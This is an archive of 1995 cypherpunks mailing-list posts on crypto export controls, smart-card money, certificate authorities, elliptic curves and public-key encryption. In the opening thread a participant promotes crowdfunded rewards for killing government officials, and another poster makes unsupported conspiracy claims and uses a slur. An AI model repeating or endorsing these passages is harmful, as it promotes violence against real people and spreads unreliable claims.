    contracting local assembly.  closing down in the U.S. literally means
    off NASDAQ.
	the fact that our government is effectively totalitarian is their 
    paranoia -only paranoia that they might miss something or that they
    are not in total control stimulates the kind of attack on the 
    Constitution that is going on. 
 
> I didn't say that the code would ever be "re-exported":  A copy would be
> brought into the US for domestic use, and everyone else outside the border
> would get their own copy from an outside server. 
> 
> 
> >    secondly, it appears there is a move afoot to make it an ITAR 
> >violation to hire the foreign nationals to circumvent ITAR --basically, 
> >the Feds want to stop cryptography _everywhere_, including telling 
> >Russians they can not work for U.S. companies!  Just where do they think 
> >they are getting off?
> 
> It is for this kind of problem that I "invented" my concept of
> "Assassination Politics":  If everybody pissed off at this situation was
> willing to donate $10 to a fund to reward the deaths of a few government
> officials responsible for ITAR, I can well imagine that this would shake
> them up a bit.  
> 

Robert East <viking@pacifier.com> said
 > What all these postings show is the desire of the federal government to
 > attempt to control crypto.  In the past, they were, virtually, the only
 > source for encryption equipment and/or computer code.  Well, now that
 > isn't true anymore.  They came up with ITAR regulations to attempt to
 > put a lid on crypto and other technological developments but it is like
 > trying to use a sieve to carry water.  There are many programmers and
 > others who will produce code and make sure that it is exported
 > anonymously just to prove that the government isn't "All Powerful."
 > 
     	<#2 attila> yes, that is true, but that is not the point --we have
    been doing that ever since I have been involved in crypto. 20 years
    ago when the heat was on me, somebody else dumped it whereever. even
    simple things get the Feds' dander up and they need an example; if I
    had not had a U.S. Senator (and I never even met the gentleman) in my
    corner, I would have gone down for the big one in '76. 
	Look at the problem Phil Zimmerman is having --several hundred
    thousand dollars in legal fees so far --for what; the original
    algorithms were published in Scientific American in Oct 77 --and then
    there was _silence_.  Just try and find a copy of that issue in a
    public library; most were pulled. 
	I may have been really pissed off after a couple thugs in trench
    coats knocked on _my_ door early morning to read me my rights for
    "exporting technology to a foreign power," or being detained in a
    little white room for 36 hours at immigration after speaking at a
    conference in Sweden and another in Copenhagen that was highly
    critical of U.S. policy --and discussing advanced hardware techniques
    for emulating BCD machines in not BCD bit slices --just happened to
    match the old Burroughs 3500s which were in all the missle silos
    --now, whatever gave them that idea? :)
	Ask Phil Zimmerman if he would do it again-- I will, because I
    don't give a shit, am old enough that I can afford to have ethics, and
    I am a Jeffersonian democrat; jefferson must be spinning over the 
    speed of light over what the _conservatives_ would do, let alone what
    the liberal Democrats will bleed and do, like Clinton, or Hillary and
    her lez buddy Thomases, who, unpaid, occupies an office in the front
    row (she was the one who was seen carrying Foster's files upstairs to
    Hillary). 

 > At some point in time the feds are going to put their collective tails
 > between their legs and go slink away to some convenient hiding place. 
 > I think it's a case of Pandora's box being opened with no way of
 > reclosing it. 
 >
	<#2 attila>  naw. they're too stupid and too paranoid to give up. 
    the U.S. has not had a free election since Lincoln's first term and
    Stanton wrote the War Powers Act which, to this day, has not been
    repealed. Russia has more democracy than the U.S. --even if they are
    totally SNAFU.  The U.S. hasn't degenerated to Hussein or the
    Ayatollah, but if NSA and Freeh have their way, it might. As Will
    Rogers said in the early 30s: "...go to the circus? why would I want 
    to do that when Congress is in session?"  or Mark Twain, who said
    something to the effect:  "...the only natural criminal class in
    America is our Congress...."
	it's all a matter of control, or the appearance of being in 
    control. No, they cant bust all of us, but they can set some pretty 
   painful and expensive example of a few of us.  ...been there, and done
   that! 

 > Bob





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 26 Nov 1995 00:07:09 +0800
To: cypherpunks@toad.com
Subject: Money: Back to the Future?
Message-ID: <199511250137.CAA12316@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Wall Street Journal, Nov 23, 1995.

Money: Back to the Future?

By Walter Wriston (Former chairman of Citicorp)

Americans are about to begin using a new kind of money
that may have consequences for the Federal Reserve's
control of the money supply and almost certainly for the
velocity of money.

Over the years, people have used all kinds of things for
money, from the huge immovable stones in the front yards
of the residents of Yap Island to the more familiar
silver and gold. All these various mediums of exchange
will now be joined in our country by the "smart" card --
a piece of plastic embedded with a microchip.

Smart cards combine features of the following: automatic
teller machine cards that let you access your bank
account and draw cash; MasterCard or Visa cards that
permit you to buy now and pay later; and debit cards that
charge an account at the time of purchase. Not only can
smart cards do all of the above but they can also serve
as an "electronic purse" independent of your bank
account. These cards contain real money that can be spent
at stores and restaurants. In effect, the card is an
electronic traveler's check, but one that makes exact
change. In addition, the integrated circuit chip allows
a higher degree of security for the information stored
than do the current magnetic strip cards.

Smart cards are common in Europe and Asia, where some 400
million were shipped last year. The first large-scale use
of smart cards in this country will occur next year at
the Summer Olympics in Atlanta. Plans call for 300,000
rechargeable cards, and 700,000 disposable cards in
denominations of $25, $50 and $100. These cards would fit
nicely into the payment habits of Americans, since in the
U.S. it is estimated that 88% of transactions are done by
cash or check, and of these 83% are for less than $10. In
Atlanta, electronic "purse cards," which contain stored
value, could be spent at pay phones or vending machines.
When their stored value is exhausted, they are thrown
away. The smart cards, by contrast, can be taken back to
the issuer and recharged.

Their broad issuance and use could return America to
something very close to the free banking of the last
century, when every commercial bank issued dollar bills,
backed sometimes by the skill of the management,
sometimes by doubtful state bonds and sometimes by gold
or silver.

We have grown so accustomed to the familiar Federal
Reserve note that many forget that Americans had no
central bank for about 75 years -- from 1836, when
President Jackson vetoed the bill to renew the charter of
the Second Bank of the United States, to the start of
World War I, when the Federal Reserve Act was passed.
After the passage by New York state of the Free Banking
Act in 1838, the idea of state-chartered banks spread
across the country, and each commercial bank issued its
own dollar bills of various shapes and sizes.

This does not mean that the 19th century witnessed
complete currency chaos. In 1863, the National Bank Act
was passed to create a market in the government bonds
needed to finance the Civil War and to bring some order
to the private issuance of currency. The act required
that bank notes issued by commercial banks be uniform in
appearance and that they be backed by collateral
consisting of U.S. Treasury securities. As the old Civil
War bonds were paid off, the currency base of the country
declined some 60% from 1881 to 1890. This inflexible
system led to panics and instability.

To a certain extent, the Treasury Department during this
time assumed some of the functions of a central bank. All
during this period a debate raged, not about whether
America needed a central bank but about "free silver" and
the price at which the Treasury would buy gold and
silver. It was not until the eve of World War I that
passage of the Federal Reserve Act finally gave the U.S.
government a monopoly on the creation of money.

Now we may be going back to the future. The advent of
smart cards means that the Fed will lose its monopoly on
issuing currency, except that this time the new money
will be issued not only by banks but by all kinds of
companies, from convenience stores to telephone
companies. Nor is this the only trend threatening the
Fed's monopoly: Information technology is about to permit
the creation of both electronic token money and cash
money in cyberspace. Already we have Digi Cash in
Amsterdam reviving in modern guise something very close
to the old American free-banking system -- issuing
electronic money (backed by some depository bank holding
collateral in the form of Treasury securities) and
performing the clearing function.

None of this is necessarily a cause for panic. There is
very little, if any, evidence that government has managed
our currency values any better than the commercial banks
did in pre-Fed days. Indeed, the Nobel laureate economist
F.A. Hayek put it more strongly: "The history of
government management of money has, except for a few
short happy periods, been one of incessant fraud and
deception."

Still these new trends do present worries for central
bankers. If more and more firms issue cards for cash or
credit, what will be the effect on the velocity of money?
How will central banks form policies on the control of
the money supply if any company can issue electronic
purse cards on credit, with or without collateral? What
will happen if the issuer of the card goes broke?

As smart cards become more visible in America, regulators
and governments will begin to wonder about control of
money and credit. The Eulopean system of central banks
has produced an advisory report outlining a possible
regulatory response, and in this countly some Fed
officials are starting to wonder if their regulations
will be applicable. If one definition of money is an
object that has no use except to be given to someone else
in exchange for goods or services, smart cards are money
-- and they are coming to your neighborhood soon.

-----












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sun, 26 Nov 1995 01:45:59 +0800
To: perry@piermont.com
Subject: Re: Cypherpunk Certification Authority
In-Reply-To: <199511251650.LAA01055@jekyll.piermont.com>
Message-ID: <199511251732.JAA15922@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> though, that being an anti-fan of X.509 the situation would be ironic...
> 
> Perry

	Speaking of ironic situations, my sister recently
mentioned that her fiancee is a good friend of Jim Bidzos and asked
me if I wanted a job with RSADSI. If I wasn't planning on leaving
the employed-by-others arena I would have seriously considered it. ;-)

	In terms of being a CA. I have considered making Community
COnneXion a CA for its customers, but I haven't done much research
into what is involved in doing that.


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Sun, 26 Nov 1995 02:24:18 +0800
To: cypherpunks@toad.com
Subject: Re: ecash protocol: living in denial
In-Reply-To: <199511250744.SAA14637@sweeney.cs.monash.edu.au>
Message-ID: <Pine.3.89.9511250939.A44825-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 25 Nov 1995, Jiri Baum wrote:

> >    - Ian "Why exactly isn't DigiCash releasing the protocol?  What about
> > 	    the source?"
> ...
> 
> A Source Close To Digicash That Did Not Wish To Be Quoted
> once described them as 'crown jewels' (competitive advantage).
Can you say RC4?

> 
> ASCTDTDNWTBQ then appealed to Digicash's track record.
> 
> I certainly hope that this genuinely is not Digicash's official opinion.
Heh.
Can you say RSADSI? (or Ron Rivest? Or NSA on Mr. Blaze's bogus LEAFs?
Need I say Elementrix non-algorithmic POTP?)

They were lucky Rivest's a decent cryptographer. (which reminds me,
what's the current list of "secure" block ciphers, besides for des and idea?
what's been analyzed or weakened lately? I'm too broke to get Schneier's 
2nd ed. to check.)

> Thank you for once again showing the futility of security by obscurity.

As Ian himself is demonstrating.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Sun, 26 Nov 1995 02:41:24 +0800
To: gjeffers@socketis.net>
Subject: Re: [rehash] Re: crypto for porno users
Message-ID: <acdd0f7b040210046a9a@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:05 PM 11/24/95, s1113645@tesla.cc.uottawa.ca wrote:
>Watch the cpunks go round and round and round and...
>
>On Fri, 24 Nov 1995, Gary Jeffers wrote:
>
>>    I know little of the theory of Dining Cryptographers but I would think
>> that a good implementation of it would make infiltrators useless. I will
>> leave it for other Cypherpunks to discuss the mechanics (specific and
>> general) for actually doing this.
>
>Dining Cryptographers nets (aka DC-nets) are the whole idea behind the
>type 2 anon remailers like Mixmaster, and the remailernet in general.
>You'll find a lot on this in the archives, the ftp site (which has Chaum's
>DC article and a good explanation by Tim May) and a few peoples' pages.
>(I think they're mostly pointed to in the pages I list)
>

I wish this were the case. Mixmaster is not based on the "Dining
Cryptographers" problem, but based on Chaum's "Digital Mixes".

Digital mixes hide the fact that A is communicating with B.
DC nets allow an individual A in a group of people A' to send a message
so that it is impossible to tell who in the group sent it (but it is known
to have been one of the members of A').

        -Lance

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Mon, 27 Nov 1995 03:30:01 +0800
To: cypherpunks@toad.com
Subject: Re: Cypherpunk Certification Authority
Message-ID: <199511261922.LAA16753@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 01:53 AM 11/26/95 -0800, anonymous-remailer@shell.portal.com wrote:
>You'd rather sign before encryption??
>
>Doesn't that give you "known plain-text" to attack?

The signature is not known unless the whole message being signed is
known.

And any encryption scheme that is vulnerable to known plaintext attack
where only a part of the message is known, is worthless anyway.


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 26 Nov 1995 00:57:25 +0800
To: Aleph One <aleph1@dfw.net>
Subject: Re: Cypherpunk Certification Authority
In-Reply-To: <Pine.SUN.3.91.951124235921.16448A@dfw.net>
Message-ID: <199511251650.LAA01055@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Aleph One writes:
> 	Since now Netscape allows for user defined certification authorities
> I would like to hear some ideas for a Cybpherpunk CA. Probably run by one 
> of the respected member in the group such as Sammer, Perry or Tim. I would
> like to hear some discussion about creating the certificates based on
> the web of trust of your PGP key, etc. Any takers?

Hmmm. If someone is willing to find out what is needed to become a
C.A. and to run one, and it turns out not to be particularly onerous,
I or one of my corporate alter egos might be willing. I must say,
though, that being an anti-fan of X.509 the situation would be ironic...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Mon, 27 Nov 1995 04:09:56 +0800
To: "Rev. Mark Grant" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: [NOISE] Re: crypto for porno users
Message-ID: <199511262001.MAA19515@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 03:42 PM 11/26/95 +0000, Rev. Mark Grant wrote:
> Incidentally, the "Sun" newspaper, one of the most popular in the UK
> (sells 3,000,000-4,000,000 copies daily, AFAIR), has often printed
> half-page erotic pictures of topless sixteen-year-old girls. Would this be
> "kiddie porn"  in the US ?

Yes

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Mon, 27 Nov 1995 04:17:09 +0800
To: cypherpunks@toad.com
Subject: Elliptic curves, current status?
Message-ID: <199511262008.MAA20100@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


I have read:

That public key cryptography using elliptic curves is much 
faster than using integers, for comparable security.

That public key cryptography using elliptic curves is much 
slower than using integers, for comparable security.

That the numbers required have many more bits.

That the numbers required have somewhat less bits.

That elliptic curves are about the same, but the programs 
are a lot nastier.

Can someone tell me the true story?


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Sheppard <Matthew.Sheppard@Comp.VUW.AC.NZ>
Date: Sat, 25 Nov 1995 08:25:13 +0800
To: cypherpunks@toad.com
Subject: Re: "lack" of export control rules
In-Reply-To: <Pine.BSD.3.91.951124054104.12402A-100000@usr4.primenet.com>
Message-ID: <199511250017.NAA16018@paramount.comp.vuw.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


The shadowy figure took form and announced "I am attila and I say ...
> On Thu, 23 Nov 1995, sameer wrote:
>  a> The feds have never established a general policy.
> 
>     in other words, business as usual with the Feds. If there is no "book"
> on what is or is not legal v/v ITAR, and the agency responsible will not
> communicate, it empirically says:  "...well, be reasonable to meet the
> intent of the law, but we will not tell you what is really expected;
> however, if, in the futute, we decide what we really want, we will bust
> you if you did not fully comply despite your good intentions --and, if
> that does not fly, we'll charge you with conspiracy...." 

Just had an idea for Netscapes case.  If we suppose that the ITAR
governors ever managed to agree on a purely electronic based, export
controlled distribution method then Netscape can write a Java applet
or LiveScript to perform the task.  This would mean a *click here to
download* interface and bypass the obfuscated process that dogs MIT
pgp.

--
                                          <URL:http://www.comp.vuw.ac.nz/~matt>
                 |~    |~
             |~ o|    o|
       ('<  o| 
      ,',)   
     ''<<    
     ---""---




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Sun, 26 Nov 1995 04:19:58 +0800
To: jis@mit.edu (Jeffrey I. Schiller)
Subject: Re: PGP Distribution Site at MIT *DOWN*
Message-ID: <199511252011.NAA01255@mailhost1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat Nov 25th, 1995:
>We apologize for the inconvenience and hope to have full service
>restored shortly.
>                               -Jeff

Can you PLEASE put the .org permissions back in it!
Thanks ever so much. censored.org can't get in.

Love Always,

Carol Anne
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLd3ZorpjEWs1wBlAQHQXQP9EzvOuKxWs3f1gLPbhmUC7BMJcHLR8Dfz
jeU0AyGsxp9KWvfeut2nNzbSYsAgzLGUwmoQcU66t8iJPCXVW/mCORo5R1tExi+p
RFlPrhyfJyDxJfNT/RzRlrQT6KDj5U4AizIliaGdVh3KVHUmOiUNxX/4FAUQTKpl
c+kEefbMElI=
=9Y9F
-----END PGP SIGNATURE-----
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Sun, 26 Nov 1995 04:33:08 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Cypherpunk Certification Authority
In-Reply-To: <199511251650.LAA01055@jekyll.piermont.com>
Message-ID: <Pine.SUN.3.91.951125141719.4185B-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 25 Nov 1995, Perry E. Metzger wrote:

> Hmmm. If someone is willing to find out what is needed to become a
> C.A. and to run one, and it turns out not to be particularly onerous,
> I or one of my corporate alter egos might be willing. I must say,
> though, that being an anti-fan of X.509 the situation would be ironic...
> 
> Perry

Well from Netscape perspetive as far as I know you need nothing. Basicly
when the browser finds a new CA that it does know about it promts
the user and through a series of dialog boxes the user chooses to trust
it or not. (Well that is theory, and what netscape release notes say, since
I dont have access to an SSL server right now, and would need to figure
out how to make my own certificate, I havent tried it).

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jis@mit.edu (Jeffrey I. Schiller)
Date: Sun, 26 Nov 1995 08:11:01 +0800
To: Cypherpunks@toad.com
Subject: PGP Distribution Site at MIT *DOWN*
Message-ID: <acdd1d160002100417e5@[18.72.0.238]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

The anonymous FTP server running on net-dist.mit.edu (which is also
bitsy.mit.edu) is currently down due to a failure of the disk drive
that hosts the files. We expect to replace the disk this afternoon
(Saturday) and begin restoral operational as soon as the new disk
is cabled up.

We apologize for the inconvenience and hope to have full service
restored shortly.

                                 -Jeff

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLdruMUtR20Nv5BtAQELyAP/ekj4hTskW7rEqW5lTidmE67yjqxDWlj0
ahCYBpGOHyE6SRmoCNpjAyHkTu0As1rfdcyZOziDdlHkYWgyxPu3yjrQ9J5yvpM7
V+Q2EWSHHePjlXx9oyHa6FwkgwUkwTAQpuZBC9fu9Jp0HxPs7a6JC+6WSAJi342J
EDGnqFtxTp8=
=+MsK
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Sun, 26 Nov 1995 07:50:13 +0800
To: cypherpunks@toad.com
Subject: Learning Elliptic Curves
Message-ID: <acdc748500021004e06b@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


I have found an easy introduction to elliptic curves. It is "Rational
Points on Elliptic Curves" by Joseph H. Silverman & John Tate.
(Springer-Verlag ISBN: 0-387-97825-9 or 3-540-97825-9) It is a breezy
undergraduate introduction. It emphasizes the mathematical elegance. It
mentions crypto applications but does not delve deeply.

Schneier recommends "Elliptic Curve Public Key Cryptosystems" by Alfred J.
Menezes. (Kluwer Academic Publishers ISBN: 0-7923-9368-6) That book has
only a very compressed theory section which already requires knowledge of
field theory. I think that the first book is a good intro to the second,
which does cover crypto applications.

What I learned is that elliptic curves are an alternative to finite fields
for crpto purposes. Here is what they have in common:
There are many (2^70 -- 2^2000) values any one of which can be represented
in the machine in constant space. a_i is the ith one of these values. If
someone sends you a_i it is real hard to figure out what i is. There is an
operation that isn't too expensive for computing a_(i+j) given a_i and a_j.
For some big integer i you can compute a_i in about (log i)^3 steps. For
RSA, knowing how to do these two computations does not reveal what the
period of the sequence is, i.e. what is the first i such that a_0 = a_i.
Knowing the period is tantamount to knowing the private key.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Sun, 26 Nov 1995 04:29:09 +0800
To: Andreas Bogk <andreas@artcom.de>
Subject: Re: Cypherpunk Certification Authority
In-Reply-To: <m0tJPeV-0002eCC@horten>
Message-ID: <Pine.SUN.3.91.951125150446.848J-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


Alas, certain critical social steps have been elided in the proposed 
protocol.  As it happens, I'm working on an article, to be published in 
the Oregon Law Review next year, on "The Importance of Trusted Third 
Parties in Electronic Commerce".  It's mostly about the care and feeding 
(and legal liability!) of a CA.  Unfortunately for this discussion, I'm 
only part way through my thinking about what the liability of a CA might 
be so I don't have carefully considered conclusions to offer you.  Try me 
again in a few weeks.

In the absence of legislation...

[PLUG:  if you haven't already done so, RUSH to my homepage

http://www.law.miami.edu/~froomkin

and click on the link to the ABA draft of the digital signature 
guidelines.  This mis-named document is actually all about CA liability.  
Comment period now extended to mid-January.]

...you need to worry about who might *use* the certificates, and what they
might to do the CA in the case of mis-certification or other misfortune. 
At the very least, there is a tort claim for "negligent
mis-representation" the first time an inaccurate certificate, or an
accurate certificate referencing a compromised key, is used in a
transaction that goes sour. 

I don't give legal advice on line, ever, so I can't tell you how to avoid
liability. I'm not even sure that this is possible absent legislation.  I
can, however, mention techniques that at this writing seem to me to be an
essential part of any liability-reduction strategy, without any claim that
these alone suffice to protect you to the level that I would want to be
protected (I'm a cautious guy). 
  
Repeat: I do claim that pending further thought these steps seem necessary, 
**not** that they are sufficient:

A) Establish a clear certification policy document, describing in detail 
what checks are made before issuing a certificate, how quickly CRLs are 
posted, and where.  This doesn't mean onerous checks are necessary, just 
that you need to be clear as to what checking a certficiate from you 
emboidies.  Publish this document.

B) Reference this policy document in every certificate.

C) Don't settle for less than X.509 ver 3, because this allows the 
certificate to carry within it a reference to the location of the CRL 
list.  Use that feature.

D) Establish a very reliable mechanism to ensure CRLs are posted where 
and when they should be.

E) Use a secure, trusted, computer system.

Again, I note that this is NOT a complete list of what you need to do. 
For more inspiration consult the ABA document referenced above. 

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Sun, 26 Nov 1995 05:48:21 +0800
To: cypherpunks@toad.com
Subject: Re: Cypherpunk Certification Authority
In-Reply-To: <Pine.SUN.3.91.951125141719.4185B-100000@dfw.net>
Message-ID: <199511252135.PAA01435@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> Basicly when the browser finds a new CA that it does know about it promts
> the user and through a series of dialog boxes the user chooses to trust it
> or not. 

Is anyone running an ssl web server that would let us see how this works?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sun, 26 Nov 1995 05:09:38 +0800
To: froomkin@law.miami.edu (Michael Froomkin)
Subject: Re: Cypherpunk Certification Authority
In-Reply-To: <Pine.SUN.3.91.951125150446.848J-100000@viper.law.miami.edu>
Message-ID: <199511252105.QAA08724@homeport.org>
MIME-Version: 1.0
Content-Type: text



| C) Don't settle for less than X.509 ver 3, because this allows the 
| certificate to carry within it a reference to the location of the CRL 
| list.  Use that feature.

	Does X.509 version 3 fix the problem that Ross Anderson points
out in his 'Robustness Principles' paper? (Crypto '95 proceedings, or
ftp.cl.cam.ac.uk/users/rja14/robustness.ps.Z)

	Its an excellent paper, well worth reading, but the basic
problem is that X.509 encrypts before signing.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 25 Nov 1995 23:15:25 +0800
To: cypherpunks@toad.com
Subject: Gates: Jiffy Iffy Crypto
Message-ID: <199511251506.QAA03450@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



>From "The Road Ahead," by Bill Gates, with Nathan
Myhrvold and Peter Rinearson, Viking, 1995.


[Paths to the Highway, pp. 106-111]

Governments have long understood the importance of
keeping information private, for both economic and
military reasons. The need to make personal, commercial,
military, or diplomatic messages secure (or to break into
them) has attracted powerful intellects through the
generations. It is very satisfying to break an encoded
message. Charles Babbage, who made dramatic advances in
the art of code breaking in the mid-1800s, wrote:
"Deciphering is, in my opinion, one of the most
fascinating of arts, and I fear I have wasted upon it
more time than it deserves." I discovered its fascination
as a kid when, like kids everywhere, a bunch of us played
with simple ciphers. We would encode messages by
substituting one letter of the alphabet for another. If
a friend sent me a cipher that began "ULFW NZXX," it
would be fairly easy to guess that this represented "DEAR
BILL," and that U stood for D, and L for E, and so forth.
With those seven letters it wasn't hard to unravel the
rest of the cipher fairly quickly.

Past wars have been won or lost because the most powerful
governments on earth didn't have the cryptological power
any interested junior high school student with a personal
computer can harness today. Soon any child old enough to
use a computer will be able to transmit encoded messages
that no government on earth will find easy to decipher.
This is one of the profound implications of the spread of
fantastic computing power.

When you send a message across the information highway it
will be "signed" by your computer or other information
appliance with a digital signature that only you are
capable of applying, and it will be encrypted so that
only the intended recipient will be able to decipher it.
You'll send a message, which could be information of any
kind, including voice, video, or digital money. The
recipient will be able to be almost positive that the
message is really from you, that it was sent at exactly
the indicated time, that it has not been tampered with in
the slightest, and that others cannot decipher it.

The mechanism that will make this possible is based on
mathematical principles, including what are called
"one-way functions" and "public-key encryption." These
are quite advanced concepts, so I'm only going to touch
on them. Keep in mind that regardless of how complicated
the system is technically, it will be extremely easy for
you to use. You'll just tell your information appliance
what you want it to do and it will seem to happen
effortlessly.

A one-way function is something that is much easier to do
than undo. Breaking a pane of glass is a one-way
function, but not one useful for encoding. The sort of
one-way function required for cryptography is one that is
easy to undo if you know an extra piece of information
and very diffficult to undo without that information.
There are a number of such one-way functions in
mathematics. One involves prime numbers. Kids learn about
prime numbers in school. A prime number cannot be divided
evenly by any number except 1 and itself. Among the first
dozen numbers, the primes are 2, 3, 5, 7, and 11. The
numbers 4, 6, 8, and 10 are not prime because 2 divides
into each of them evenly. The number 9 is not prime
because 3 divides into it evenly. There are an infinite
number of prime numbers, and there is no known pattern to
them except that they are prime. When you multiply two
prime numbers together, you get a number that can be
divided evenly only by those same two primes. For
example, only 5 and 7 can be divided evenly into 35.
Finding the primes is called "factoring" the number.

It is easy to multiply the prime numbers 11,927 and
20,903 and get the number 249,310,081, but it is much
harder to recover from the product, 249,310,081, the two
prime numbers that are its factors. This one-way
function, the difficulty of factoring numbers, underlies
an ingenious kind of cipher: the most sophisticated
encryption system in use today. It takes a long time for
even the largest computers to factor a really large
product back into its constituent primes. A coding system
based on factoring uses two different decoding keys, one
to encipher a message and a different but related one to
decipher. With only the enciphering key, it's easy to
encode a message, but deciphering it within any practical
period of time is nearly impossible. Deciphering requires
a separate key, available only to the intended recipient
of the message -- or, rather, to the recipient's
computer. The enciphering key is based on the product of
two huge prime numbers, whereas the deciphering key is
based on the primes themselves. A computer can generate
a new pair of unique keys in a flash, because it is easy
for a computer to generate two large prime numbers and
multiply them together. The enciphering key thus created
can be made public without appreciable risk, because of
the difficulty even another computer would have factoring
it to obtain the deciphering key.

The practical application of this encryption will be at
the center of the information highway's security system.
The world will become quite reliant on this network, so
it is important that security be handled competently. You
can think of the information highway as a postal network
where everyone has a mailbox that is impervious to
tampering and has an unbreakable lock. Each mailbox has
a slot that lets anyone slide information in, but only
the owner of a mailbox has the key to get information
out. (Some governments may insist that each mailbox have
a second door with a separate key that the government
keeps, but we'll ignore that political consideration for
now and concentrate on the security that software will
provide.)

Each user's computer or other information appliance will
use prime numbers to generate an enciphering key, which
will be listed publicly, and a corresponding deciphering
key, which only the user will know. This is how it will
work in practice: I have information I want to send you.
My information appliance/computer system looks up your
public key and uses it to encrypt the information before
sending it. No one can read the message, even though your
key is public knowledge, because your public key does not
contain the information needed for decryption. You
receive the message and your computer decrypts it with a
private key that corresponds to your public key.

You want to answer. Your computer looks up my public key
and uses it to encrypt your reply. No one else can read
the message, even though it was encrypted with a key that
is totally public. Only I can read it because only I have
the private deciphering key. This is very practical,
because no one has to trade keys in advance.

